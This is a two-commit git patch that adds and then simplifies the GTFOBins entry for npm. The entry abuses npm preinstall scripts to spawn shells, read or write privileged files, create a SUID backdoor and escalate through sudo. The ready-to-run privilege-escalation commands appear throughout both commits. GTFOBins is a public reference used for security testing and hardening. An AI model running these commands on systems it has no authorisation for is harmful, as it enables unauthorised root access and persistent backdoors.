From f8ff5eddc78db871a3e996cc6962ffba554ab3c2 Mon Sep 17 00:00:00 2001 From: Hardeep Singh <54495695+holmes-py@users.noreply.github.com> Date: Tue, 19 Jan 2021 23:52:33 +0530 Subject: [PATCH 1/2] Added npm.md --- _gtfobins/npm.md | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 _gtfobins/npm.md diff --git a/_gtfobins/npm.md b/_gtfobins/npm.md new file mode 100644 index 0000000..81c586d --- /dev/null +++ b/_gtfobins/npm.md @@ -0,0 +1,32 @@ +--- +functions: + shell: + - description: Get a shell as the user used to execute the binary. + code: | + echo '{"scripts": { "preinstall": "/bin/bash -p" }}' > package.json \ + npm i . --unsafe-perm + file-read: + - description: Read un/privileged files if the npm binary have read access. The file path must be absolute. + code: | + FILE=name_of_file + echo '{"scripts": { "preinstall": "cat '$FILE' " }}' > package.json \ + npm i . --unsafe-perm + file-write: + - description: Write to un/privileged files if the npm binary have write access. The file path must be absolute. + code: | + FILE=name_of_file \ + DATA=data_to_write \ + echo '{"scripts": { "preinstall": "echo '$DATA' > '$FILE' " }}' > package.json \ + npm i . --unsafe-perm + suid: + - description: If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges. This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path. + code: | + sudo install -m =xs $(which npm) . \ + echo '{"scripts": { "preinstall": "/bin/bash -p" }}' > package.json \ + npm i . --unsafe-perm + sudo: + - description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. + code: | + echo '{"scripts": { "preinstall": "/bin/bash -p" }}' > package.json \ + sudo npm i . --unsafe-perm +--- From 2ce5e831b74361e89d812c4d9a0237eafe163670 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 21 Jan 2021 15:04:27 +0100 Subject: [PATCH 2/2] Fix npm --- _gtfobins/npm.md | 35 ++++++++--------------------------- 1 file changed, 8 insertions(+), 27 deletions(-) diff --git a/_gtfobins/npm.md b/_gtfobins/npm.md index 81c586d..7bc88ae 100644 --- a/_gtfobins/npm.md +++ b/_gtfobins/npm.md @@ -1,32 +1,13 @@ --- functions: shell: - - description: Get a shell as the user used to execute the binary. - code: | - echo '{"scripts": { "preinstall": "/bin/bash -p" }}' > package.json \ - npm i . --unsafe-perm - file-read: - - description: Read un/privileged files if the npm binary have read access. The file path must be absolute. - code: | - FILE=name_of_file - echo '{"scripts": { "preinstall": "cat '$FILE' " }}' > package.json \ - npm i . --unsafe-perm - file-write: - - description: Write to un/privileged files if the npm binary have write access. The file path must be absolute. - code: | - FILE=name_of_file \ - DATA=data_to_write \ - echo '{"scripts": { "preinstall": "echo '$DATA' > '$FILE' " }}' > package.json \ - npm i . --unsafe-perm - suid: - - description: If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges. This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path. - code: | - sudo install -m =xs $(which npm) . \ - echo '{"scripts": { "preinstall": "/bin/bash -p" }}' > package.json \ - npm i . --unsafe-perm + - code: | + TF=$(mktemp -d) + echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json + npm -C $TF i sudo: - - description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. - code: | - echo '{"scripts": { "preinstall": "/bin/bash -p" }}' > package.json \ - sudo npm i . --unsafe-perm + - code: | + TF=$(mktemp -d) + echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json + sudo npm -C $TF --unsafe-perm i ---